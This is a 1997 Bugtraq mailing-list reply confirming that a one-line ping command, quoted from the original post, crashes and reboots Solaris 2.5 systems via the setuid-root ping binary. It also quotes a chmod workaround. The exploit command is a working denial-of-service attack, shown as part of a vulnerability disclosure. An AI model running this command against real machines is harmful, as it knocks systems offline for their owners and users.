[4807] in bugtraq
Re: Solaris Ping bug (DoS)
daemon@ATHENA.MIT.EDU (just me.)
Thu Jun 26 15:00:20 1997
Date: Thu, 26 Jun 1997 19:12:38 +0900
Reply-To: matt@bikkle.iac.co.jp
From: "just me." <matt@BIKKLE.IAC.CO.JP>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <19970626000829.28333@atl.eni.net>
Works on my box-
SunOS myhost 5.5.1 Generic_103640-08 sun4m sparc SUNW,SPARCstation-20
-r-sr-xr-x 1 root bin 18172 May 3 1996 /usr/sbin/ping
instant panic and reboot.
On Thu, 26 Jun 1997, Adam Caldwell wrote:
> I briefly searched the bugtraq archives and didn't see this one, so here's a
> way to reboot a Solaris box, and is exploitable by anyone with an account on
> the system since ping is setuid root.
>
> ping -sv -i 127.0.0.1 224.0.0.1
>
> On solaris 2.5, causes the machine to reboot (personal experience). I've
> had independent reports of it crashing 2.5.1, and 2.5 (x86). It probably works
> on all versions of Solaris.
>
> To "fix" the denial of service:
> chmod go-x /usr/sbin/ping
> if you don't mind disabling Ping on your system.
--matt@bikkle.iac.co.jp--(MG406)-------------------------------------------
Technical Operations "This is a truly bogus example."
Internet Access Center Tokyo, Japan -The Bat book, p.506
